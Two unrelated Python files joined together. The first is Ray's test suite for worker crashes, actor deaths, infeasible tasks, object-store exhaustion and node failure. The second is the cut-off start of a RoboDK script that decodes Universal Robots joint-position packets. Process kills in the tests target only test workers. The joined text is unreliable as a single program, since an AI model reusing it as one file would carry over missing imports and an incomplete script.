def test_worker_dying(ray_start_regular, error_pubsub):
    """A task that kills its own worker process must raise
    WorkerCrashedError and push a WORKER_DIED_PUSH_ERROR."""
    pubsub = error_pubsub

    # Define a remote function that kills the worker that runs it.
    @ray.remote(max_retries=0)
    def kill_self():
        eval("exit()")

    with pytest.raises(ray.exceptions.WorkerCrashedError):
        ray.get(kill_self.remote())
    errors = get_error_message(pubsub, 1,
                               ray_constants.WORKER_DIED_PUSH_ERROR)
    assert len(errors) == 1
    death_notice = errors[0]
    assert death_notice.type == ray_constants.WORKER_DIED_PUSH_ERROR
    assert "died or was killed while executing" in death_notice.error_message
def test_actor_worker_dying(ray_start_regular, error_pubsub):
    """Getting a result from an actor whose worker died must raise, and a
    task consuming that result must raise as well."""
    pubsub = error_pubsub

    @ray.remote
    class Actor:
        def kill(self):
            eval("exit()")

    @ray.remote
    def consume(x):
        pass

    actor = Actor.remote()
    [obj], _ = ray.wait([actor.kill.remote()], timeout=5)
    # The killed actor's own task surfaces as RayActorError...
    with pytest.raises(ray.exceptions.RayActorError):
        ray.get(obj)
    # ...and a downstream task depending on it fails with RayTaskError.
    with pytest.raises(ray.exceptions.RayTaskError):
        ray.get(consume.remote(obj))
    errors = get_error_message(pubsub, 1,
                               ray_constants.WORKER_DIED_PUSH_ERROR)
    assert len(errors) == 1
    assert errors[0].type == ray_constants.WORKER_DIED_PUSH_ERROR
def test_actor_worker_dying_future_tasks(ray_start_regular, error_pubsub):
    """With max_restarts=0, tasks submitted both before and after the
    actor's worker is SIGKILLed must all fail."""
    pubsub = error_pubsub

    @ray.remote(max_restarts=0)
    class Actor:
        def getpid(self):
            return os.getpid()

        def sleep(self):
            time.sleep(1)

    actor = Actor.remote()
    pid = ray.get(actor.getpid.remote())
    submitted_before = [actor.sleep.remote() for _ in range(10)]
    os.kill(pid, 9)
    time.sleep(0.1)
    submitted_after = [actor.sleep.remote() for _ in range(10)]
    # Every outstanding call must raise now that the process is gone.
    for ref in submitted_before + submitted_after:
        with pytest.raises(Exception):
            ray.get(ref)
    errors = get_error_message(pubsub, 1,
                               ray_constants.WORKER_DIED_PUSH_ERROR)
    assert len(errors) == 1
    assert errors[0].type == ray_constants.WORKER_DIED_PUSH_ERROR
def test_actor_worker_dying_nothing_in_progress(ray_start_regular):
    """Even with no task in flight, a call on an actor whose worker was
    SIGKILLed must raise rather than hang (max_restarts=0)."""
    @ray.remote(max_restarts=0)
    class Actor:
        def getpid(self):
            return os.getpid()

    actor = Actor.remote()
    pid = ray.get(actor.getpid.remote())
    os.kill(pid, 9)
    time.sleep(0.1)
    with pytest.raises(Exception):
        ray.get(actor.getpid.remote())
def test_actor_scope_or_intentionally_killed_message(ray_start_regular,
                                                     error_pubsub):
    """An actor going out of scope, or being terminated explicitly, must
    not push any error to the driver.

    Fix: corrected the typo "propogated" -> "propagated" in the
    assertion message.
    """
    p = error_pubsub
    @ray.remote
    class Actor:
        pass
    # The first handle is dropped by the reassignment below, which lets
    # that actor go out of scope.
    a = Actor.remote()
    # The second actor is terminated explicitly.
    a = Actor.remote()
    a.__ray_terminate__.remote()
    time.sleep(1)
    errors = get_error_message(p, 1)
    assert len(errors) == 0, "Should not have propagated an error - {}".format(
        errors)
def test_exception_chain(ray_start_regular):
    """An exception raised in a nested task must surface via ray.get as
    both its original type (ZeroDivisionError) and a RayTaskError.

    Fix: the original bare try/except silently passed when ray.get did
    not raise at all; pytest.raises now enforces that it does.
    """
    @ray.remote
    def bar():
        return 1 / 0

    @ray.remote
    def foo():
        return ray.get(bar.remote())

    r = foo.remote()
    with pytest.raises(ZeroDivisionError) as exc_info:
        ray.get(r)
    # The raised exception is a RayTaskError subclass of the cause type.
    assert isinstance(exc_info.value, RayTaskError)
@pytest.mark.skip("This test does not work yet.")
@pytest.mark.parametrize(
    "ray_start_object_store_memory", [10**6], indirect=True)
def test_put_error1(ray_start_object_store_memory, error_pubsub):
    """Getting an evicted object whose originating task is still running
    should push a PUT_RECONSTRUCTION_PUSH_ERROR (test currently skipped)."""
    p = error_pubsub
    num_objects = 3
    object_size = 4 * 10**5
    # Define a task with a single dependency, a numpy array, that returns
    # another array.
    @ray.remote
    def single_dependency(i, arg):
        arg = np.copy(arg)
        arg[0] = i
        return arg
    @ray.remote
    def put_arg_task():
        # Launch num_objects instances of the remote task, each dependent
        # on the one before it. The result of the first task should get
        # evicted.
        args = []
        arg = single_dependency.remote(0, np.zeros(
            object_size, dtype=np.uint8))
        for i in range(num_objects):
            arg = single_dependency.remote(i, arg)
            args.append(arg)
        # Get the last value to force all tasks to finish.
        value = ray.get(args[-1])
        assert value[0] == i
        # Get the first value (which should have been evicted) to force
        # reconstruction. Currently, since we're not able to reconstruct
        # `ray.put` objects that were evicted and whose originating tasks
        # are still running, this for-loop should hang and push an error to
        # the driver.
        ray.get(args[0])
    put_arg_task.remote()
    # Make sure we receive the correct error message.
    errors = get_error_message(p, 1,
                               ray_constants.PUT_RECONSTRUCTION_PUSH_ERROR)
    assert len(errors) == 1
    assert errors[0].type == ray_constants.PUT_RECONSTRUCTION_PUSH_ERROR
@pytest.mark.skip("This test does not work yet.")
@pytest.mark.parametrize(
    "ray_start_object_store_memory", [10**6], indirect=True)
def test_put_error2(ray_start_object_store_memory):
    """Same as test_put_error1 but the evicted object comes from ray.put
    directly (test currently skipped)."""
    # This is the same as the previous test, but it calls ray.put directly.
    num_objects = 3
    object_size = 4 * 10**5
    # Define a task with a single dependency, a numpy array, that returns
    # another array.
    @ray.remote
    def single_dependency(i, arg):
        arg = np.copy(arg)
        arg[0] = i
        return arg
    @ray.remote
    def put_task():
        # Launch num_objects instances of the remote task, each dependent
        # on the one before it. The result of the first task should get
        # evicted.
        args = []
        arg = ray.put(np.zeros(object_size, dtype=np.uint8))
        for i in range(num_objects):
            arg = single_dependency.remote(i, arg)
            args.append(arg)
        # Get the last value to force all tasks to finish.
        value = ray.get(args[-1])
        assert value[0] == i
        # Get the first value (which should have been evicted) to force
        # reconstruction. Currently, since we're not able to reconstruct
        # `ray.put` objects that were evicted and whose originating tasks
        # are still running, this for-loop should hang and push an error to
        # the driver.
        ray.get(args[0])
    put_task.remote()
    # Make sure we receive the correct error message.
    # get_error_message(ray_constants.PUT_RECONSTRUCTION_PUSH_ERROR, 1)
@pytest.mark.skip("Publish happens before we subscribe it")
def test_version_mismatch(error_pubsub, shutdown_only):
    """Starting Ray with a mismatched version string must push a
    VERSION_MISMATCH_PUSH_ERROR.

    Fixes: removed a leftover debug `assert False, errors` that made the
    real assertions below unreachable, and corrected the typo "happeds"
    in the skip reason.
    """
    ray_version = ray.__version__
    ray.__version__ = "fake ray version"
    ray.init(num_cpus=1)
    p = error_pubsub
    errors = get_error_message(p, 1, ray_constants.VERSION_MISMATCH_PUSH_ERROR)
    assert len(errors) == 1
    assert errors[0].type == ray_constants.VERSION_MISMATCH_PUSH_ERROR
    # Reset the version so later tests are unaffected.
    ray.__version__ = ray_version
def test_export_large_objects(ray_start_regular, error_pubsub):
    """Closing over a large object in a remote function or actor must
    generate a PICKLING_LARGE_OBJECT_PUSH_ERROR warning on export.

    Fix: dropped the redundant local `import ray.ray_constants` —
    `ray_constants` is already available at module scope (every other
    test in this file uses it without a local import).
    """
    p = error_pubsub
    large_object = np.zeros(2 * ray_constants.PICKLE_OBJECT_WARNING_SIZE)

    @ray.remote
    def f():
        # Reference the closure variable so it is pickled with the task.
        large_object

    # Invoke the function so that the definition is exported.
    f.remote()
    # Make sure that a warning is generated.
    errors = get_error_message(p, 1,
                               ray_constants.PICKLING_LARGE_OBJECT_PUSH_ERROR)
    assert len(errors) == 1
    assert errors[0].type == ray_constants.PICKLING_LARGE_OBJECT_PUSH_ERROR

    @ray.remote
    class Foo:
        def __init__(self):
            large_object

    Foo.remote()
    # Make sure that a warning is generated.
    errors = get_error_message(p, 1,
                               ray_constants.PICKLING_LARGE_OBJECT_PUSH_ERROR)
    assert len(errors) == 1
    assert errors[0].type == ray_constants.PICKLING_LARGE_OBJECT_PUSH_ERROR
@pytest.mark.skip(reason="TODO detect resource deadlock")
def test_warning_for_resource_deadlock(error_pubsub, shutdown_only):
    """A blocked task whose children can never all be scheduled should
    push a RESOURCE_DEADLOCK_ERROR (test currently skipped)."""
    p = error_pubsub
    # Check that we get warning messages for infeasible tasks.
    ray.init(num_cpus=1)
    @ray.remote(num_cpus=1)
    class Foo:
        def f(self):
            return 0
    @ray.remote
    def f():
        # Creating both actors is not possible.
        actors = [Foo.remote() for _ in range(2)]
        for a in actors:
            ray.get(a.f.remote())
    # Run in a task to check we handle the blocked task case correctly
    f.remote()
    errors = get_error_message(p, 1, ray_constants.RESOURCE_DEADLOCK_ERROR)
    assert len(errors) == 1
    assert errors[0].type == ray_constants.RESOURCE_DEADLOCK_ERROR
def test_warning_for_infeasible_tasks(ray_start_regular, error_pubsub):
    """Submitting work whose resource demands can never be satisfied must
    push an INFEASIBLE_TASK_ERROR, for tasks and for actors alike."""
    pubsub = error_pubsub

    # The cluster has no GPU, so this task is infeasible.
    @ray.remote(num_gpus=1)
    def needs_gpu():
        pass

    # No "Custom" resource exists either, so this placement is infeasible.
    @ray.remote(resources={"Custom": 1})
    class NeedsCustom:
        pass

    needs_gpu.remote()
    errors = get_error_message(pubsub, 1, ray_constants.INFEASIBLE_TASK_ERROR)
    assert len(errors) == 1
    assert errors[0].type == ray_constants.INFEASIBLE_TASK_ERROR
    NeedsCustom.remote()
    errors = get_error_message(pubsub, 1, ray_constants.INFEASIBLE_TASK_ERROR)
    assert len(errors) == 1
    assert errors[0].type == ray_constants.INFEASIBLE_TASK_ERROR
def test_warning_for_infeasible_zero_cpu_actor(shutdown_only):
    """An actor cannot be placed on a 0-CPU cluster: even though the
    creation task itself requires no CPUs, an infeasibility warning must
    be pushed."""
    ray.init(num_cpus=0)
    pubsub = init_error_pubsub()

    @ray.remote
    class Foo:
        pass

    # The actor creation should be infeasible.
    Foo.remote()
    errors = get_error_message(pubsub, 1, ray_constants.INFEASIBLE_TASK_ERROR)
    assert len(errors) == 1
    assert errors[0].type == ray_constants.INFEASIBLE_TASK_ERROR
    pubsub.close()
def test_warning_for_too_many_actors(shutdown_only):
    """Creating far more long-running actors than there are CPUs must
    repeatedly warn that the worker pool is growing too large."""
    num_cpus = 2
    ray.init(num_cpus=num_cpus)
    pubsub = init_error_pubsub()

    @ray.remote
    class Sleeper:
        def __init__(self):
            time.sleep(1000)

    def expect_worker_pool_warning(actor_count):
        # Each actor blocks in its constructor, forcing a new worker.
        [Sleeper.remote() for _ in range(actor_count)]
        errors = get_error_message(pubsub, 1,
                                   ray_constants.WORKER_POOL_LARGE_ERROR)
        assert len(errors) == 1
        assert errors[0].type == ray_constants.WORKER_POOL_LARGE_ERROR

    expect_worker_pool_warning(num_cpus * 3)
    expect_worker_pool_warning(num_cpus)
    pubsub.close()
def test_warning_for_too_many_nested_tasks(shutdown_only):
    """Nested blocked tasks that force many extra workers to start must
    trigger a worker-pool-size warning."""
    num_cpus = 2
    ray.init(num_cpus=num_cpus)
    pubsub = init_error_pubsub()

    @ray.remote
    def leaf():
        time.sleep(1000)
        return 1

    @ray.remote
    def middle():
        time.sleep(1)
        ray.get(leaf.remote())

    @ray.remote
    def root():
        # Sleep so that the leaf tasks all get submitted to the scheduler
        # after the root tasks.
        time.sleep(1)
        ray.get(middle.remote())

    [root.remote() for _ in range(num_cpus * 4)]
    errors = get_error_message(pubsub, 1,
                               ray_constants.WORKER_POOL_LARGE_ERROR)
    assert len(errors) == 1
    assert errors[0].type == ray_constants.WORKER_POOL_LARGE_ERROR
    pubsub.close()
def test_warning_for_many_duplicate_remote_functions_and_actors(shutdown_only):
    """Exporting the same remote function/actor class more than
    DUPLICATE_REMOTE_FUNCTION_THRESHOLD times must log a warning.

    Refactor: the identical capture-log-and-poll sequence (previously
    duplicated for the function and the actor case) is extracted into
    one helper, and the polling loop got a short sleep instead of
    busy-waiting.
    """
    ray.init(num_cpus=1)
    import io

    def capture_export_warning(trigger):
        # Run `trigger` while listening on ray.import_thread.logger and
        # return whatever it logged (polling up to 10 seconds).
        # TODO(rkn): It's terrible to have to rely on this implementation
        # detail, the fact that the warning comes from
        # ray.import_thread.logger. However, I didn't find a good way to
        # capture the output for all loggers simultaneously.
        log_capture_string = io.StringIO()
        ch = logging.StreamHandler(log_capture_string)
        ray.import_thread.logger.addHandler(ch)
        trigger()
        start_time = time.time()
        log_contents = ""
        while time.time() < start_time + 10:
            log_contents = log_capture_string.getvalue()
            if len(log_contents) > 0:
                break
            time.sleep(0.1)
        ray.import_thread.logger.removeHandler(ch)
        return log_contents

    @ray.remote
    def create_remote_function():
        @ray.remote
        def g():
            return 1
        return ray.get(g.remote())

    for _ in range(ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD - 1):
        ray.get(create_remote_function.remote())
    # The export crossing the threshold must produce the warning.
    log_contents = capture_export_warning(
        lambda: ray.get(create_remote_function.remote()))
    assert "remote function" in log_contents
    assert "has been exported {} times.".format(
        ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD) in log_contents

    # Now test the same thing but for actors.
    @ray.remote
    def create_actor_class():
        # Require a GPU so that the actor is never actually created and we
        # don't spawn an unreasonable number of processes.
        @ray.remote(num_gpus=1)
        class Foo:
            pass
        Foo.remote()

    for _ in range(ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD - 1):
        ray.get(create_actor_class.remote())
    log_contents = capture_export_warning(
        lambda: ray.get(create_actor_class.remote()))
    assert "actor" in log_contents
    assert "has been exported {} times.".format(
        ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD) in log_contents
def test_redis_module_failure(ray_start_regular):
    """Exercise the error paths of Ray's custom Redis module commands:
    bad arities, out-of-range prefixes/channels, and invalid indices."""
    address = ray_start_regular["redis_address"].split(":")
    assert len(address) == 2

    def make_client():
        return redis.StrictRedis(
            host=address[0],
            port=int(address[1]),
            password=ray_constants.REDIS_DEFAULT_PASSWORD)

    def run_failure_test(expecting_message, *command):
        with pytest.raises(
                Exception, match=".*{}.*".format(expecting_message)):
            make_client().execute_command(*command)

    def run_one_command(*command):
        make_client().execute_command(*command)

    run_failure_test("wrong number of arguments", "RAY.TABLE_ADD", 13)
    run_failure_test("Prefix must be in the TablePrefix range",
                     "RAY.TABLE_ADD", 100000, 1, 1, 1)
    run_failure_test("Prefix must be in the TablePrefix range",
                     "RAY.TABLE_REQUEST_NOTIFICATIONS", 100000, 1, 1, 1)
    run_failure_test("Prefix must be a valid TablePrefix integer",
                     "RAY.TABLE_ADD", b"a", 1, 1, 1)
    run_failure_test("Pubsub channel must be in the TablePubsub range",
                     "RAY.TABLE_ADD", 1, 10000, 1, 1)
    run_failure_test("Pubsub channel must be a valid integer", "RAY.TABLE_ADD",
                     1, b"a", 1, 1)
    # Change the key from 1 to 2, since the previous command should have
    # succeeded at writing the key, but not publishing it.
    run_failure_test("Index is less than 0.", "RAY.TABLE_APPEND", 1, 1, 2, 1,
                     -1)
    run_failure_test("Index is not a number.", "RAY.TABLE_APPEND", 1, 1, 2, 1,
                     b"a")
    run_one_command("RAY.TABLE_APPEND", 1, 1, 2, 1)
    # It's okay to add duplicate entries.
    run_one_command("RAY.TABLE_APPEND", 1, 1, 2, 1)
    run_one_command("RAY.TABLE_APPEND", 1, 1, 2, 1, 0)
    run_one_command("RAY.TABLE_APPEND", 1, 1, 2, 1, 1)
    run_one_command("RAY.SET_ADD", 1, 1, 3, 1)
    # It's okay to add duplicate entries.
    run_one_command("RAY.SET_ADD", 1, 1, 3, 1)
    run_one_command("RAY.SET_REMOVE", 1, 1, 3, 1)
    # It's okay to remove duplicate entries.
    run_one_command("RAY.SET_REMOVE", 1, 1, 3, 1)
# Note that this test will take at least 10 seconds because it must wait for
# the monitor to detect enough missed heartbeats.
def test_warning_for_dead_node(ray_start_cluster_2_nodes, error_pubsub):
    """Killing both raylets must produce one REMOVED_NODE_ERROR naming
    each dead node."""
    cluster = ray_start_cluster_2_nodes
    cluster.wait_for_nodes()
    p = error_pubsub
    node_ids = {item["NodeID"] for item in ray.nodes()}
    # Try to make sure that the monitor has received at least one heartbeat
    # from the node.
    time.sleep(0.5)
    # Kill both raylets.
    cluster.list_all_nodes()[1].kill_raylet()
    cluster.list_all_nodes()[0].kill_raylet()
    # Check that we get warning messages for both raylets. The trailing 40
    # is a generous timeout to cover heartbeat-miss detection.
    errors = get_error_message(p, 2, ray_constants.REMOVED_NODE_ERROR, 40)
    # Extract the client IDs from the error messages. This will need to be
    # changed if the error message changes (the node ID is assumed to be
    # the 6th whitespace-separated token).
    warning_node_ids = {error.error_message.split(" ")[5] for error in errors}
    assert node_ids == warning_node_ids
def test_raylet_crash_when_get(ray_start_regular):
    """ray.get on a freed object must raise ObjectLostError even if the
    raylet dies while the get is blocked."""
    def kill_raylet_after_delay():
        # Don't kill raylet before default workers get connected.
        time.sleep(2)
        ray.worker._global_node.kill_raylet()

    object_ref = ray.put(np.zeros(200 * 1024, dtype=np.uint8))
    ray.internal.free(object_ref)
    killer = threading.Thread(target=kill_raylet_after_delay)
    killer.start()
    with pytest.raises(ray.exceptions.ObjectLostError):
        ray.get(object_ref)
    killer.join()
def test_connect_with_disconnected_node(shutdown_only):
    """The monitor marks SIGKILLed nodes dead exactly once each, while a
    gracefully removed (SIGTERM) node produces no error at all."""
    config = {
        "num_heartbeats_timeout": 50,
        "raylet_heartbeat_timeout_milliseconds": 10,
    }
    cluster = Cluster()
    cluster.add_node(num_cpus=0, _system_config=config)
    ray.init(address=cluster.address)
    p = init_error_pubsub()
    errors = get_error_message(p, 1, timeout=5)
    assert len(errors) == 0
    # Each node killed by SIGKILL is marked dead by ray_monitor once.
    for _ in range(2):
        dead_node = cluster.add_node(num_cpus=0)
        cluster.remove_node(dead_node, allow_graceful=False)
        errors = get_error_message(p, 1, ray_constants.REMOVED_NODE_ERROR)
        assert len(errors) == 1
    # A node killed by SIGTERM is not marked again by ray_monitor.
    removing_node = cluster.add_node(num_cpus=0)
    cluster.remove_node(removing_node, allow_graceful=True)
    errors = get_error_message(p, 1, timeout=2)
    assert len(errors) == 0
    # There is no connection error to a dead node.
    errors = get_error_message(p, 1, timeout=2)
    assert len(errors) == 0
    p.close()
@pytest.mark.parametrize(
    "ray_start_cluster_head", [{
        "num_cpus": 5,
        "object_store_memory": 10**8,
        "_system_config": {
            "object_store_full_max_retries": 0
        }
    }],
    indirect=True)
def test_parallel_actor_fill_plasma_retry(ray_start_cluster_head):
    """Five actors each repeatedly returning objects of half the object
    store's size must all complete without errors."""
    @ray.remote
    class LargeMemoryActor:
        def some_expensive_task(self):
            return np.zeros(10**8 // 2, dtype=np.uint8)

    workers = [LargeMemoryActor.remote() for _ in range(5)]
    for _ in range(10):
        in_flight = [w.some_expensive_task.remote() for w in workers]
        # Drain the batch one result at a time.
        while in_flight:
            [finished], in_flight = ray.wait(in_flight, num_returns=1)
def test_fill_object_store_exception(shutdown_only):
    """With store retries disabled, overfilling plasma must raise
    ObjectStoreFullError (via RayTaskError for remote work) and must not
    kill the actor."""
    ray.init(
        num_cpus=2,
        object_store_memory=10**8,
        _system_config={"object_store_full_max_retries": 0})
    @ray.remote
    def expensive_task():
        return np.zeros((10**8) // 10, dtype=np.uint8)
    # 20 tasks x 10MB results exceed the 100MB store, so at least one
    # task fails; its cause must be ObjectStoreFullError.
    with pytest.raises(ray.exceptions.RayTaskError) as e:
        ray.get([expensive_task.remote() for _ in range(20)])
    with pytest.raises(ray.exceptions.ObjectStoreFullError):
        raise e.as_instanceof_cause()
    @ray.remote
    class LargeMemoryActor:
        def some_expensive_task(self):
            # A single return value larger than the whole store.
            return np.zeros(10**8 + 2, dtype=np.uint8)
        def test(self):
            return 1
    actor = LargeMemoryActor.remote()
    with pytest.raises(ray.exceptions.RayTaskError):
        ray.get(actor.some_expensive_task.remote())
    # Make sure actor does not die
    ray.get(actor.test.remote())
    # A driver-side put larger than the store must fail directly.
    with pytest.raises(ray.exceptions.ObjectStoreFullError):
        ray.put(np.zeros(10**8 + 2, dtype=np.uint8))
def test_fill_object_store_lru_fallback(shutdown_only):
    """With LRU eviction enabled, repeatedly creating objects of half the
    store's size must succeed (old objects get evicted) instead of
    raising ObjectStoreFullError."""
    config = {
        "free_objects_batch_size": 1,
    }
    ray.init(
        num_cpus=2,
        object_store_memory=10**8,
        _lru_evict=True,
        _system_config=config)
    @ray.remote
    def expensive_task():
        return np.zeros((10**8) // 2, dtype=np.uint8)
    # Check that objects out of scope are cleaned up quickly.
    ray.get(expensive_task.remote())
    start = time.time()
    for _ in range(3):
        ray.get(expensive_task.remote())
    end = time.time()
    assert end - start < 3
    # Keep the refs alive so eviction (not scope cleanup) must kick in.
    obj_refs = []
    for _ in range(3):
        obj_ref = expensive_task.remote()
        ray.get(obj_ref)
        obj_refs.append(obj_ref)
    @ray.remote
    class LargeMemoryActor:
        def some_expensive_task(self):
            return np.zeros(10**8 // 2, dtype=np.uint8)
        def test(self):
            return 1
    actor = LargeMemoryActor.remote()
    for _ in range(3):
        obj_ref = actor.some_expensive_task.remote()
        ray.get(obj_ref)
        obj_refs.append(obj_ref)
    # Make sure actor does not die
    ray.get(actor.test.remote())
    # Driver-side puts must also fall back to LRU eviction.
    for _ in range(3):
        obj_ref = ray.put(np.zeros(10**8 // 2, dtype=np.uint8))
        ray.get(obj_ref)
        obj_refs.append(obj_ref)
@pytest.mark.parametrize(
    "ray_start_cluster", [{
        "num_nodes": 1,
        "num_cpus": 2,
    }, {
        "num_nodes": 2,
        "num_cpus": 1,
    }],
    indirect=True)
def test_eviction(ray_start_cluster):
    """After an object is explicitly freed, both a direct ray.get and a
    task taking it by reference must raise."""
    @ray.remote
    def large_object():
        return np.zeros(10 * 1024 * 1024)

    @ray.remote
    def dependent_task(x):
        return

    ref = large_object.remote()
    assert isinstance(ray.get(ref), np.ndarray)
    # Evict the object.
    ray.internal.free([ref])
    # A direct get raises ObjectLostError...
    with pytest.raises(ray.exceptions.ObjectLostError):
        ray.get(ref)
    # ...and passing the object by reference raises RayTaskError.
    with pytest.raises(ray.exceptions.RayTaskError):
        ray.get(dependent_task.remote(ref))
@pytest.mark.parametrize(
    "ray_start_cluster", [{
        "num_nodes": 2,
        "num_cpus": 1,
    }, {
        "num_nodes": 1,
        "num_cpus": 2,
    }],
    indirect=True)
def test_serialized_id(ray_start_cluster):
    """An ObjectRef serialized inside a list argument must still resolve
    inside the receiving task, directly or via a dependent task."""
    @ray.remote
    def small_object():
        # Sleep a bit before creating the object to force a timeout
        # at the getter.
        time.sleep(1)
        return 1

    @ray.remote
    def dependent_task(x):
        return x

    @ray.remote
    def get(obj_refs, test_dependent_task):
        print("get", obj_refs)
        inner_ref = obj_refs[0]
        if test_dependent_task:
            assert ray.get(dependent_task.remote(inner_ref)) == 1
        else:
            assert ray.get(inner_ref) == 1

    # Cover both sources (task result, ray.put) with both consumption
    # modes (direct get, dependent task), in the same order as before.
    for use_dependent in (False, True):
        ray.get(get.remote([small_object.remote()], use_dependent))
    for use_dependent in (False, True):
        ray.get(get.remote([ray.put(1)], use_dependent))
@pytest.mark.parametrize("use_actors,node_failure",
                         [(False, False), (False, True), (True, False),
                          (True, True)])
def test_fate_sharing(ray_start_cluster, use_actors, node_failure):
    """A child task/actor must be cleaned up ("fate-share") when its
    parent actor's process or node dies; cleanup is observed via the
    custom "child" resource becoming schedulable again."""
    config = {
        "num_heartbeats_timeout": 10,
        "raylet_heartbeat_timeout_milliseconds": 100,
    }
    cluster = Cluster()
    # Head node with no resources.
    cluster.add_node(num_cpus=0, _system_config=config)
    ray.init(address=cluster.address)
    # Node to place the parent actor.
    node_to_kill = cluster.add_node(num_cpus=1, resources={"parent": 1})
    # Node to place the child actor.
    cluster.add_node(num_cpus=1, resources={"child": 1})
    cluster.wait_for_nodes()
    @ray.remote
    def sleep():
        time.sleep(1000)
    @ray.remote(resources={"child": 1})
    def probe():
        return
    # TODO(swang): This test does not pass if max_restarts > 0 for the
    # raylet codepath. Add this parameter once the GCS actor service is enabled
    # by default.
    @ray.remote
    class Actor(object):
        def __init__(self):
            return
        def start_child(self, use_actors):
            # Occupies the "child" resource until killed.
            if use_actors:
                child = Actor.options(resources={"child": 1}).remote()
                ray.get(child.sleep.remote())
            else:
                ray.get(sleep.options(resources={"child": 1}).remote())
        def sleep(self):
            time.sleep(1000)
        def get_pid(self):
            return os.getpid()
    # Returns whether the "child" resource is available.
    def child_resource_available():
        p = probe.remote()
        ready, _ = ray.wait([p], timeout=1)
        return len(ready) > 0
    # Test fate sharing if the parent process dies.
    def test_process_failure(use_actors):
        a = Actor.options(resources={"parent": 1}).remote()
        pid = ray.get(a.get_pid.remote())
        a.start_child.remote(use_actors=use_actors)
        # Wait for the child to be scheduled.
        wait_for_condition(lambda: not child_resource_available())
        # Kill the parent process.
        os.kill(pid, 9)
        wait_for_condition(child_resource_available)
    # Test fate sharing if the parent node dies.
    def test_node_failure(node_to_kill, use_actors):
        a = Actor.options(resources={"parent": 1}).remote()
        a.start_child.remote(use_actors=use_actors)
        # Wait for the child to be scheduled.
        wait_for_condition(lambda: not child_resource_available())
        # Kill the parent process.
        cluster.remove_node(node_to_kill, allow_graceful=False)
        node_to_kill = cluster.add_node(num_cpus=1, resources={"parent": 1})
        wait_for_condition(child_resource_available)
        return node_to_kill
    if node_failure:
        test_node_failure(node_to_kill, use_actors)
    else:
        test_process_failure(use_actors)
    # Sanity-check how many worker-failure entries were recorded in redis.
    ray.state.state._check_connected()
    keys = [
        key for r in ray.state.state.redis_clients
        for key in r.keys("WORKER_FAILURE*")
    ]
    if node_failure:
        assert len(keys) <= 1, len(keys)
    else:
        assert len(keys) <= 2, len(keys)
if __name__ == "__main__":
    # Allow running this test file directly (outside the pytest CLI).
    import pytest
    sys.exit(pytest.main(["-v", __file__]))
|
UR_ActivateMonitoring.py | # This script creates a thread to monitor the position and other variables from a real UR robot
# With this script active, RoboDK will create a new target when the robot is moved a certain tolerance
#
# More information about the RoboDK API here:
# https://robodk.com/doc/en/RoboDK-API.html
# Press F5 to run the script
# Or visit: https://robodk.com/doc/en/PythonAPI/index.html
from robodk.robolink import * # API to communicate with RoboDK
from robodk.robomath import * # Robot toolbox
import threading
import socket
import struct
import os
import time
# Refresh the screen every time the robot position changes
TOLERANCE_JOINTS_REFRESH = 0.1  # degrees: passed as tolerance_deg to Robot_Joints_Check
RETRIEVE_JOINTS_ONCE = False  # If True, the current robot position will be retrieved once only
# Create targets given a tolerance in degrees
CREATE_TARGETS = False
TOLERANCE_JOINTS_NEWTARGET = 10  # in degrees
REFRESH_RATE = 0.01  # seconds slept per main-loop iteration (see pause() at the bottom)
# Make current robot joints accessible in case we run it on a separate thread
# NOTE(review): a `global` statement at module scope is a no-op; the name is
# actually created by the `ROBOT_JOINTS = None` assignment further down.
global ROBOT_JOINTS
# Procedure to check if robot joint positions are different according to a certain tolerance
def Robot_Joints_Check(jA, jB, tolerance_deg=1):
    """Return True if joint lists jA and jB differ by more than
    tolerance_deg in any joint, or if jA is None (no previous reading).

    Both joint lists and the tolerance are in degrees (ROBOT_JOINTS is
    converted to degrees in on_packet).

    Fixes: the original compared the degree difference against
    `tolerance_deg * pi / 180`, i.e. it silently shrank the tolerance
    ~57x by converting it to radians; the comparison is now done in
    degrees. Also generalized from a hard-coded 6 joints to any number
    of joints (extra elements in the longer list are ignored).
    """
    if jA is None:
        return True
    return any(abs(a - b) > tolerance_deg for a, b in zip(jA, jB))
#########################################################################
# Byte shifts to point to the right byte data inside a packet
# (byte offsets into the robot's streamed state packet; each joint value
# group is read as 6 consecutive big-endian doubles — see packet_value).
UR_GET_TIME = 1
UR_GET_JOINT_POSITIONS = 252
UR_GET_JOINT_SPEEDS = 300
UR_GET_JOINT_CURRENTS = 348
UR_GET_TCP_FORCES = 540
# Get packet size according to the byte array
def packet_size(buf):
    """Return the packet length encoded in the first 4 bytes of buf
    (big-endian signed int), or 0 when fewer than 4 bytes are buffered."""
    if len(buf) >= 4:
        (size,) = struct.unpack_from("!i", buf, 0)
        return size
    return 0
# Check if a packet is complete
def packet_check(buf):
    """Return True when buf contains at least one complete packet (the
    buffered data covers the packet's declared length); otherwise print
    a notice and return False."""
    expected = packet_size(buf)
    if len(buf) >= expected:
        return True
    print("Incorrect packet size %i vs %i" % (expected, len(buf)))
    return False
# Get specific information from a packet
def packet_value(buf, offset, nval=6):
    """Unpack nval big-endian doubles from buf starting at byte offset.

    Returns a list of nval floats, or None if the packet is too short to
    hold them (e.g. an older Polyscope version with smaller packets).

    Fixes: the bounds check compared len(buf) against `offset + nval`,
    but each value is an 8-byte double, so packets between those two
    sizes passed the check and struct.unpack_from raised instead of
    returning None. Also renamed the local `format` (shadowed the
    builtin) and built the format string without a loop.
    """
    if len(buf) < offset + nval * 8:
        print("Not available offset (maybe older Polyscope version?): %i - %i" % (len(buf), offset))
        return None
    fmt = '!' + 'd' * nval
    return list(struct.unpack_from(fmt, buf, offset))
# Action to take when a new packet arrives
def on_packet(packet):
    """Decode the joint positions from a state packet and publish them
    (converted to degrees) through the ROBOT_JOINTS global that the main
    loop reads.

    Fix: packet_value returns None for too-short packets; the original
    then crashed the monitor thread with a TypeError in the list
    comprehension. Such packets are now skipped.
    """
    global ROBOT_JOINTS
    # Retrieve desired information from a packet
    rob_joints_RAD = packet_value(packet, UR_GET_JOINT_POSITIONS)
    if rob_joints_RAD is None:
        # Packet too short (older controller version?): keep the last
        # known joints instead of killing the monitor thread.
        return
    ROBOT_JOINTS = [ji * 180.0 / pi for ji in rob_joints_RAD]
    #ROBOT_SPEED = packet_value(packet, UR_GET_JOINT_SPEEDS)
